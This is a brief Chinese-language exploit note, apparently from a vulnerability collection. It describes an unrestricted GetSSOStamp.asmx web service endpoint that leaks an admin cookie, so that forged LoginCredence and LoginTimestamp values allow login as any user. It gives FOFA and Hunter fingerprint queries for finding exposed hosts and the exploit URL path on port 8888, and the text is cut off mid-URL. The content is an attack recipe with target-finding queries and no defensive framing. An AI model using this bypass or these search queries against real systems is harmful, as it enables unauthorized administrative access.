由于/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmj接口未作限制,导致可以通过该接口调用admin的cookie值,通过对LoginCredence和LoginTimestamp的参数修改,进而实现任意登录进去系统.
fofa:fid=”/yV4r5PdARKT4jaqLjJYqw==” body=”/Services/Identification/Server” hunter:web.body=”/Services/Identification/Server/“ 

http://ip:8888/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx?op=GetStamp url后拼接/WebService/Lk6SyncService/DirectToOthe